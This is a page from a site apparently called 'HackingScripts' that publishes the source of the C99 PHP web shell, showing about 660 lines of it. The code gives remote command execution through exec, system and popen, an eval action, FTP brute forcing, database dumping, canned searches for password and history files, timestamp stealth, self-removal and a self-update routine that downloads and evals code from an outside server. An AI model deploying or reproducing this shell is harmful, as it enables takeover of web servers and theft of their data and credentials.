HackingScripts

Hack Scripts for everybody

C99 shell

24 Jan 2014

This is one of the most commonly uploaded shell scripts to my website.

The below script looks like an old version. Check out the updated c99 script here.

C99 Shell Script Source Code

   1 <?php 
   2 //Starting calls 
   3 if (!function_exists("getmicrotime")) {function getmicrotime() {
   4     list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
   5 error_reporting(5); 
   6 @ignore_user_abort(TRUE); 
   7 @set_magic_quotes_runtime(0); 
   8 $win = strtolower(substr(PHP_OS,0,3)) == "win"; 
   9 define("starttime",getmicrotime()); 
  10 if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="")
  11     {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {
  12         strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
  13 $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
  14 foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
  15 $shver = "1.0 pre-release build #16"; //Current version 
  16 //CONFIGURATION AND SETTINGS 
  17 if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
  18 elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
  19 else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
  20 } 
  21 $surl_autofill_include = TRUE; // If TRUE then search variables with 
  22                                // descriptors (URLs) and save it in SURL. 
  23 if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; 
  24     foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); 
  25     $name = urldecode($v[0]); $value = urldecode($v[1]); 
  26     foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
  27         if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".
  28             urlencode($value)."&";}}} 
  29         if ($_REQUEST["surl_autofill_include"]) {
  30             $includestr .= "surl_autofill_include=1&";}} 
  31 if (empty($surl)) { 
  32     $surl = "?".$includestr; //Self url 
  33 } 
  34 $surl = htmlspecialchars($surl); 
  35 $timelimit = 0; // time limit of execution this script over 
  36                 // server quote (seconds), 0 = unlimited. 
  37 //Authentication 
  38 $login = ""; //login 
  39 //DON'T FORGOT ABOUT PASSWORD!!! 
  40 $pass = ""; //password 
  41 $md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
  42 $host_allow = array("*"); //array ("{mask}1","{mask}2",...), 
  43     {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
  44 $login_txt = "Restricted area"; //http-auth message. 
  45 $accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">
  46     c99shell v.".$shver."</a>: access denied"; 
  47 $gzipencode = TRUE; //Encode with gzip? 
  48 $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
  49 $c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server 
  50 $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server 
  51 $filestealth = TRUE; //if TRUE, don't change modify- and access-time 
  52 $donated_html = "<center><b>Owned by hacker</b></center>"; 
  53 /* If you publish free shell and you wish 
  54 add link to your site or any other information, 
  55 put here your html. */ 
  56 $donated_act = array(""); // array ("act1","act2,"...), 
  57                           // if $act is in this array, display $donated_html. 
  58 $curdir = "./"; //start folder 
  59 //$curdir = getenv("DOCUMENT_ROOT"); 
  60 $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
  61 $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
  62 $log_email = "0xd4yx@gmail.com"; //
  63 $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
  64 $sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
  65 // Registered file-types. 
  66 //  array( 
  67 //   "{action1}"=>array("ext1","ext2","ext3",...), 
  68 //   "{action2}"=>array("ext4","ext5","ext6",...), 
  69 //   ... 
  70 //  ) 
  71 $ftypes  = array( 
  72 "html"=>array("html","htm","shtml"), 
  73 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), 
  74 "exe"=>array("sh","install","bat","cmd"), 
  75 "ini"=>array("ini","inf"), 
  76 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), 
  77 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), 
  78 "sdb"=>array("sdb"), 
  79 "phpsess"=>array("sess"), 
  80 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") 
  81 ); 
  82 // Registered executable file-types. 
  83 //  array( 
  84 //   string "command{i}"=>array("ext1","ext2","ext3",...), 
  85 //   ... 
  86 //  ) 
  87 //   {command}: %f% = filename 
  88 $exeftypes  = array( 
  89 getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
  90 "perl %f%" => array("pl","cgi") 
  91 ); 
  92 /* Highlighted files. 
  93   array( 
  94    i=>array({regexp},{type},{opentag},{closetag},{break}) 
  95    ... 
  96   ) 
  97   string {regexp} - regular exp. 
  98   int {type}: 
  99 0 - files and folders (as default), 
 100 1 - files only, 2 - folders only 
 101   string {opentag} - open html-tag, e.g. "<b>" (default) 
 102   string {closetag} - close html-tag, e.g. "</b>" (default) 
 103   bool {break} - if TRUE and found match then break 
 104 */ 
 105 $regxp_highlight  = array( 
 106   array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example 
 107   array("config.php",1) // example 
 108 ); 
 109 $safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
 110 // array (i=>{letter} ...); string {letter} - letter of a drive 
 111 //$safemode_diskettes = range("a","z"); 
 112 $hexdump_lines = 8;// lines in hex preview file 
 113 $hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
 114 $nixpwdperpage = 100; // Get first N lines from /etc/passwd 
 115 $bindport_pass = "c99";  // default password for binding 
 116 $bindport_port = "31373"; // default port for binding 
 117 $bc_port = "31373"; // default port for back-connect 
 118 $datapipe_localport = "8081"; // default port for datapipe 
 119 // Command-aliases 
 120 if (!$win) 
 121 { 
 122 $cmdaliases = array( 
 123   array("-----------------------------------------------------------", "ls -la"), 
 124   array("find all suid files", "find / -type f -perm -04000 -ls"), 
 125   array("find suid files in current dir", "find . -type f -perm -04000 -ls"), 
 126   array("find all sgid files", "find / -type f -perm -02000 -ls"), 
 127   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), 
 128   array("find config.inc.php files", "find / -type f -name config.inc.php"), 
 129   array("find config* files", "find / -type f -name \"config*\""), 
 130   array("find config* files in current dir", "find . -type f -name \"config*\""), 
 131   array("find all writable folders and files", "find / -perm -2 -ls"), 
 132   array("find all writable folders and files in current dir", "find . -perm -2 -ls"), 
 133   array("find all service.pwd files", "find / -type f -name service.pwd"), 
 134   array("find service.pwd files in current dir", "find . -type f -name service.pwd"), 
 135   array("find all .htpasswd files", "find / -type f -name .htpasswd"), 
 136   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), 
 137   array("find all .bash_history files", "find / -type f -name .bash_history"), 
 138   array("find .bash_history files in current dir", "find . -type f -name .bash_history"), 
 139   array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), 
 140   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), 
 141   array("list file attributes on a Linux second extended file system", "lsattr -va"), 
 142   array("show opened ports", "netstat -an | grep -i listen") 
 143 ); 
 144 } 
 145 else 
 146 { 
 147 $cmdaliases = array( 
 148   array("-----------------------------------------------------------", "dir"), 
 149   array("show opened ports", "netstat -an") 
 150 ); 
 151 } 
 152 $sess_cookie = "c99shvars"; // Cookie-variable name 
 153 $usefsbuff = TRUE; //Buffer-function 
 154 $copy_unset = FALSE; //Remove copied files from buffer after pasting 
 155 //Quick launch 
 156 $quicklaunch = array( 
 157 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
 158 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
 159 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
 160 array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
 161 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
 162 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
 163 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
 164 array("<b>Encoder</b>",$surl."act=encoder&d=%d"), 
 165 array("<b>Tools</b>",$surl."act=tools&d=%d"), 
 166 array("<b>Proc.</b>",$surl."act=processes&d=%d"), 
 167 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), 
 168 array("<b>Sec.</b>",$surl."act=security&d=%d"), 
 169 array("<b>SQL</b>",$surl."act=sql&d=%d"), 
 170 array("<b>PHP-code</b>",$surl."act=eval&d=%d"), 
 171 array("<b>Update</b>",$surl."act=update&d=%d"), 
 172 array("<b>Feedback</b>",$surl."act=feedback&d=%d"), 
 173 array("<b>Self remove</b>",$surl."act=selfremove"), 
 174 array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") 
 175 ); 
 176 //Highlight-code colors 
 177 $highlight_background = "#c0c0c0"; 
 178 $highlight_bg = "#FFFFFF"; 
 179 $highlight_comment = "#6A6A6A"; 
 180 $highlight_default = "#0000BB"; 
 181 $highlight_html = "#1300FF"; 
 182 $highlight_keyword = "#007700"; 
 183 $highlight_string = "#000000"; 
 184 @$f = $_REQUEST["f"]; 
 185 @extract($_REQUEST["c99shcook"]); 
 186 //END CONFIGURATION 
 187 // \/Next code isn't for editing\/ 
 188 @set_time_limit(0); 
 189 $tmp = array(); 
 190 foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
 191 $s = "!^(".implode("|",$tmp).")$!i"; 
 192 if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
 193 if (!empty($login)) 
 194 { 
 195 if (empty($md5_pass)) {$md5_pass = md5($pass);} 
 196 if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
 197 { 
 198   if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
 199   header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
 200   header("HTTP/1.0 401 Unauthorized"); 
 201   exit($accessdeniedmess); 
 202 } 
 203 } 
 204 if ($act != "img") 
 205 { 
 206 $lastdir = realpath("."); 
 207 chdir($curdir); 
 208 if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
 209 $sess_data = unserialize($_COOKIE["$sess_cookie"]); 
 210 if (!is_array($sess_data)) {$sess_data = array();} 
 211 if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
 212 if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
 213 $disablefunc = @ini_get("disable_functions"); 
 214 if (!empty($disablefunc)) 
 215 { 
 216 $disablefunc = str_replace(" ","",$disablefunc); 
 217 $disablefunc = explode(",",$disablefunc); 
 218 } 
 219 if (!function_exists("c99_buff_prepare")) 
 220 { 
 221 function c99_buff_prepare() 
 222 { 
 223 global $sess_data; 
 224 global $act; 
 225 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
 226 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
 227 $sess_data["copy"] = array_unique($sess_data["copy"]); 
 228 $sess_data["cut"] = array_unique($sess_data["cut"]); 
 229 sort($sess_data["copy"]); 
 230 sort($sess_data["cut"]); 
 231 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
 232 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
 233 } 
 234 } 
 235 c99_buff_prepare(); 
 236 if (!function_exists("c99_sess_put")) 
 237 { 
 238 function c99_sess_put($data) 
 239 { 
 240 global $sess_cookie; 
 241 global $sess_data; 
 242 c99_buff_prepare(); 
 243 $sess_data = $data; 
 244 $data = serialize($data); 
 245 setcookie($sess_cookie,$data); 
 246 } 
 247 } 
 248 foreach (array("sort","sql_sort") as $v) 
 249 { 
 250 if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
 251 if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
 252 } 
 253 if ($sort_save) 
 254 { 
 255 if (!empty($sort)) {setcookie("sort",$sort);} 
 256 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
 257 } 
 258 if (!function_exists("str2mini")) 
 259 { 
 260 function str2mini($content,$len) 
 261 { 
 262 if (strlen($content) > $len) 
 263 { 
 264   $len = ceil($len/2) - 2; 
 265   return substr($content, 0,$len)."...".substr($content,-$len); 
 266 } 
 267 else {return $content;} 
 268 } 
 269 } 
 270 if (!function_exists("view_size")) 
 271 { 
 272 function view_size($size) 
 273 { 
 274 if (!is_numeric($size)) {return FALSE;} 
 275 else 
 276 { 
 277   if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
 278   elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
 279   elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
 280   else {$size = $size . " B";} 
 281   return $size; 
 282 } 
 283 } 
 284 } 
 285 if (!function_exists("fs_copy_dir")) 
 286 { 
 287 function fs_copy_dir($d,$t) 
 288 { 
 289 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
 290 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
 291 $h = opendir($d); 
 292 while (($o = readdir($h)) !== FALSE) 
 293 { 
 294   if (($o != ".") and ($o != "..")) 
 295   { 
 296    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
 297    else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
 298    if (!$ret) {return $ret;} 
 299   } 
 300 } 
 301 closedir($h); 
 302 return TRUE; 
 303 } 
 304 } 
 305 if (!function_exists("fs_copy_obj")) 
 306 { 
 307 function fs_copy_obj($d,$t) 
 308 { 
 309 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
 310 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
 311 if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
 312 if (is_dir($d)) 
 313 { 
 314   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
 315   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
 316   return fs_copy_dir($d,$t); 
 317 } 
 318 elseif (is_file($d)) {return copy($d,$t);} 
 319 else {return FALSE;} 
 320 } 
 321 } 
 322 if (!function_exists("fs_move_dir")) 
 323 { 
 324 function fs_move_dir($d,$t) 
 325 { 
 326 $h = opendir($d); 
 327 if (!is_dir($t)) {mkdir($t);} 
 328 while (($o = readdir($h)) !== FALSE) 
 329 { 
 330   if (($o != ".") and ($o != "..")) 
 331   { 
 332    $ret = TRUE; 
 333    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
 334    else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
 335    if (!$ret) {return $ret;} 
 336   } 
 337 } 
 338 closedir($h); 
 339 return TRUE; 
 340 } 
 341 } 
 342 if (!function_exists("fs_move_obj")) 
 343 { 
 344 function fs_move_obj($d,$t) 
 345 { 
 346 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
 347 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
 348 if (is_dir($d)) 
 349 { 
 350   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
 351   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
 352   return fs_move_dir($d,$t); 
 353 } 
 354 elseif (is_file($d)) 
 355 { 
 356   if(copy($d,$t)) {return unlink($d);} 
 357   else {unlink($t); return FALSE;} 
 358 } 
 359 else {return FALSE;} 
 360 } 
 361 } 
 362 if (!function_exists("fs_rmdir")) 
 363 { 
 364 function fs_rmdir($d) 
 365 { 
 366 $h = opendir($d); 
 367 while (($o = readdir($h)) !== FALSE) 
 368 { 
 369   if (($o != ".") and ($o != "..")) 
 370   { 
 371    if (!is_dir($d.$o)) {unlink($d.$o);} 
 372    else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
 373   } 
 374 } 
 375 closedir($h); 
 376 rmdir($d); 
 377 return !is_dir($d); 
 378 } 
 379 } 
 380 if (!function_exists("fs_rmobj")) 
 381 { 
 382 function fs_rmobj($o) 
 383 { 
 384 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
 385 if (is_dir($o)) 
 386 { 
 387   if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
 388   return fs_rmdir($o); 
 389 } 
 390 elseif (is_file($o)) {return unlink($o);} 
 391 else {return FALSE;} 
 392 } 
 393 } 
 394 if (!function_exists("myshellexec")) 
 395 { 
 396 function myshellexec($cmd) 
 397 { 
 398 global $disablefunc; 
 399 $result = ""; 
 400 if (!empty($cmd)) 
 401 { 
 402   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
 403   elseif (($result = `$cmd`) !== FALSE) {} 
 404   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
 405   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
 406   elseif (is_resource($fp = popen($cmd,"r"))) 
 407   { 
 408    $result = ""; 
 409    while(!feof($fp)) {$result .= fread($fp,1024);} 
 410    pclose($fp); 
 411   } 
 412 } 
 413 return $result; 
 414 } 
 415 } 
 416 if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
 417 if (!function_exists("view_perms")) 
 418 { 
 419 function view_perms($mode) 
 420 { 
 421 if (($mode & 0xC000) === 0xC000) {$type = "s";} 
 422 elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
 423 elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
 424 elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
 425 elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
 426 elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
 427 elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
 428 else {$type = "?";} 
 429 $owner["read"] = ($mode & 00400)?"r":"-"; 
 430 $owner["write"] = ($mode & 00200)?"w":"-"; 
 431 $owner["execute"] = ($mode & 00100)?"x":"-"; 
 432 $group["read"] = ($mode & 00040)?"r":"-"; 
 433 $group["write"] = ($mode & 00020)?"w":"-"; 
 434 $group["execute"] = ($mode & 00010)?"x":"-"; 
 435 $world["read"] = ($mode & 00004)?"r":"-"; 
 436 $world["write"] = ($mode & 00002)? "w":"-"; 
 437 $world["execute"] = ($mode & 00001)?"x":"-"; 
 438 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
 439 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
 440 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
 441 return $type.join("",$owner).join("",$group).join("",$world); 
 442 } 
 443 } 
 444 if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
 445 if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
 446 if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
 447 if (!function_exists("parse_perms")) 
 448 { 
 449 function parse_perms($mode) 
 450 { 
 451 if (($mode & 0xC000) === 0xC000) {$t = "s";} 
 452 elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
 453 elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
 454 elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
 455 elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
 456 elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
 457 elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
 458 else {$t = "?";} 
 459 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
 460 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
 461 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
 462 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
 463 } 
 464 } 
 465 if (!function_exists("parsesort")) 
 466 { 
 467 function parsesort($sort) 
 468 { 
 469 $one = intval($sort); 
 470 $second = substr($sort,-1); 
 471 if ($second != "d") {$second = "a";} 
 472 return array($one,$second); 
 473 } 
 474 } 
 475 if (!function_exists("view_perms_color")) 
 476 { 
 477 function view_perms_color($o) 
 478 { 
 479 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
 480 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
 481 else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
 482 } 
 483 } 
 484 if (!function_exists("c99getsource")) 
 485 { 
 486 function c99getsource($fn) 
 487 { 
 488 global $c99sh_sourcesurl; 
 489 $array = array( 
 490   "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
 491   "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
 492   "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
 493   "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
 494   "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
 495   "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
 496 ); 
 497 $name = $array[$fn]; 
 498 if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
 499 else {return FALSE;} 
 500 } 
 501 } 
 502 if (!function_exists("c99sh_getupdate")) 
 503 { 
 504 function c99sh_getupdate($update = TRUE) 
 505 { 
 506 $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
 507 $data = @file_get_contents($url); 
 508 if (!$data) {return "Can't connect to update-server!";} 
 509 else 
 510 { 
 511   $data = ltrim($data); 
 512   $string = substr($data,3,ord($data{2})); 
 513   if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
 514   if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
 515   if ($data{0} == "\x99" and $data{1} == "\x03") 
 516   { 
 517    $string = explode("\x01",$string); 
 518    if ($update) 
 519    { 
 520     $confvars = array(); 
 521     $sourceurl = $string[0]; 
 522     $source = file_get_contents($sourceurl); 
 523     if (!$source) {return "Can't fetch update!";} 
 524     else 
 525     { 
 526      $fp = fopen(__FILE__,"w"); 
 527      if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
 528      else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
 529     } 
 530    } 
 531    else {return "New version are available: ".$string[1];} 
 532   } 
 533   elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
 534   else {return "Error in protocol: segmentation failed! (".$data.") ";} 
 535 } 
 536 } 
 537 } 
 538 if (!function_exists("mysql_dump")) 
 539 { 
 540 function mysql_dump($set) 
 541 { 
 542 global $shver; 
 543 $sock = $set["sock"]; 
 544 $db = $set["db"]; 
 545 $print = $set["print"]; 
 546 $nl2br = $set["nl2br"]; 
 547 $file = $set["file"]; 
 548 $add_drop = $set["add_drop"]; 
 549 $tabs = $set["tabs"]; 
 550 $onlytabs = $set["onlytabs"]; 
 551 $ret = array(); 
 552 $ret["err"] = array(); 
 553 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
 554 if (empty($db)) {$db = "db";} 
 555 if (empty($print)) {$print = 0;} 
 556 if (empty($nl2br)) {$nl2br = 0;} 
 557 if (empty($add_drop)) {$add_drop = TRUE;} 
 558 if (empty($file)) 
 559 { 
 560   $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
 561 } 
 562 if (!is_array($tabs)) {$tabs = array();} 
 563 if (empty($add_drop)) {$add_drop = TRUE;} 
 564 if (sizeof($tabs) == 0) 
 565 { 
 566   // retrive tables-list 
 567   $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
 568   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
 569 } 
 570 $out = "# Dumped by C99Shell.SQL v. ".$shver." 
 571 # Home page: http://ccteam.ru 
 572 # 
 573 # Host settings: 
 574 # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
 575 # Date: ".date("d.m.Y H:i:s")." 
 576 # DB: \"".$db."\" 
 577 #--------------------------------------------------------- 
 578 "; 
 579 $c = count($onlytabs); 
 580 foreach($tabs as $tab) 
 581 { 
 582   if ((in_array($tab,$onlytabs)) or (!$c)) 
 583   { 
 584    if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
 585    // recieve query for create table structure 
 586    $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
 587    if (!$res) {$ret["err"][] = mysql_smarterror();} 
 588    else 
 589    { 
 590     $row = mysql_fetch_row($res); 
 591     $out .= $row["1"].";\n\n"; 
 592     // recieve table variables 
 593     $res = mysql_query("SELECT * FROM `$tab`", $sock); 
 594     if (mysql_num_rows($res) > 0) 
 595     { 
 596      while ($row = mysql_fetch_assoc($res)) 
 597      { 
 598       $keys = implode("`, `", array_keys($row)); 
 599       $values = array_values($row); 
 600       foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
 601       $values = implode("', '", $values); 
 602       $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
 603       $out .= $sql; 
 604      } 
 605     } 
 606    } 
 607   } 
 608 } 
 609 $out .= "#---------------------------------------------------------------------------------\n\n"; 
 610 if ($file) 
 611 { 
 612   $fp = fopen($file, "w"); 
 613   if (!$fp) {$ret["err"][] = 2;} 
 614   else 
 615   { 
 616    fwrite ($fp, $out); 
 617    fclose ($fp); 
 618   } 
 619 } 
 620 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
 621 return $out; 
 622 } 
 623 } 
 624 if (!function_exists("mysql_buildwhere")) 
 625 { 
 626 function mysql_buildwhere($array,$sep=" and",$functs=array()) 
 627 { 
 628 if (!is_array($array)) {$array = array();} 
 629 $result = ""; 
 630 foreach($array as $k=>$v) 
 631 { 
 632   $value = ""; 
 633   if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
 634   $value .= "'".addslashes($v)."'"; 
 635   if (!empty($functs[$k])) {$value .= ")";} 
 636   $result .= "`".$k."` = ".$value.$sep; 
 637 } 
 638 $result = substr($result,0,strlen($result)-strlen($sep)); 
 639 return $result; 
 640 } 
 641 } 
 642 if (!function_exists("mysql_fetch_all")) 
 643 { 
 644 function mysql_fetch_all($query,$sock) 
 645 { 
 646 if ($sock) {$result = mysql_query($query,$sock);} 
 647 else {$result = mysql_query($query);} 
 648 $array = array(); 
 649 while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
 650 mysql_free_result($result); 
 651 return $array; 
 652 } 
 653 } 
 654 if (!function_exists("mysql_smarterror")) 
 655 { 
 656 function mysql_smarterror($type,$sock) 
 657 { 
 658 if ($sock) {$error = mysql_error($sock);} 
 659 else {$error = mysql_error();} 
 660 $error = htmlspecialchars($error); 
 661 return $error; 
 662 } 
